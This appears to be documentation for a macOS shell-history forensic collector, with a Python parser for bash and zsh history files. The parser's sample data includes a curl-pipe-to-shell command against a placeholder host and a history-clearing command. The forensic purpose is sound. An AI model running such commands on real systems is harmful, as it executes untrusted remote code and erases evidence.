Shell History
Overview
Evidence: Shell History
Description: Collect Shell History
Category: System
Platform: macos
Short Name: shellhist
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No
Background
This collector gathers shell history information from macOS. This data is essential for understanding user activity, detecting suspicious commands, and investigating command-based incidents.
Data Collected
This collector gathers structured data about shell history.
Shell History Data
| Field | Description | Example |
|---|---|---|
| Command | The command line as recorded in the history file | Example value |
| HistoryFile | Path of the history file the entry was read from | Example value |
| UserId | Numeric ID of the user who owns the history file | 123 |
| Timestamp | Time the command was recorded, when the history file stores one | 2023-10-15 14:30:25+03:00 |
Collection Method
This collector reads history files (e.g., .bash_history, .zsh_history) and records parsed entries into the shell_history table.
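As an added illustration of the parsing step (not the collector's own code), the parser below turns bash and zsh history files into records with the four fields listed above. It assumes the two common on-disk formats: zsh EXTENDED_HISTORY lines (`: <epoch>:<elapsed>;<command>`) and bash files written with HISTTIMEFORMAT set (a `#<epoch>` line before each command); file paths, user IDs and history contents are constructed samples.

```python
"""Parse bash and zsh history files into shell_history-style records."""
import re
from datetime import datetime, timezone

# zsh EXTENDED_HISTORY: ": <epoch>:<elapsed>;<command>"
ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")
# bash with HISTTIMEFORMAT set: a "#<epoch>" line precedes each command
BASH_TS = re.compile(r"^#(\d+)$")


def to_iso(epoch):
    """Format epoch seconds like the Timestamp field (UTC here, for determinism)."""
    if epoch is None:
        return None
    return datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat(sep=" ")


def parse_history(text, history_file, user_id):
    """Return one record per command; Timestamp is None when the file stores none."""
    records, pending_ts = [], None
    lines, i = text.splitlines(), 0
    while i < len(lines):
        line, i = lines[i], i + 1
        if not line.strip():
            continue
        m = BASH_TS.match(line)
        if m:  # bash: the timestamp applies to the next command line
            pending_ts = int(m.group(1))
            continue
        m = ZSH_EXT.match(line)
        if m:
            pending_ts, line = int(m.group(1)), m.group(2)
            # zsh stores multi-line commands with a trailing backslash per line
            while line.endswith("\\") and i < len(lines):
                line, i = line[:-1] + "\n" + lines[i], i + 1
        records.append({"Command": line, "HistoryFile": history_file,
                        "UserId": user_id, "Timestamp": to_iso(pending_ts)})
        pending_ts = None  # a bash timestamp covers exactly one command
    return records


# Constructed sample history contents (hypothetical user "alice", uid 501)
SAMPLE_ZSH = (": 1697373025:0;curl -fsSL http://example.invalid/x.sh | sh\n"
              ": 1697373030:2;sudo launchctl load \\\n"
              " ~/Library/LaunchAgents/com.example.plist\n")
SAMPLE_BASH = "#1697373040\nhistory -c\nls -la\n"

if __name__ == "__main__":
    for rec in (parse_history(SAMPLE_ZSH, "/Users/alice/.zsh_history", 501)
                + parse_history(SAMPLE_BASH, "/Users/alice/.bash_history", 501)):
        print(rec)
```

Note that plain bash history without HISTTIMEFORMAT yields no timestamp at all, so ordering within the file is the only sequencing evidence for those entries.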
Forensic Value
This evidence is crucial for forensic investigations as it reveals executed commands, helping trace attacker actions, privilege escalation attempts, and persistence via command-line activity.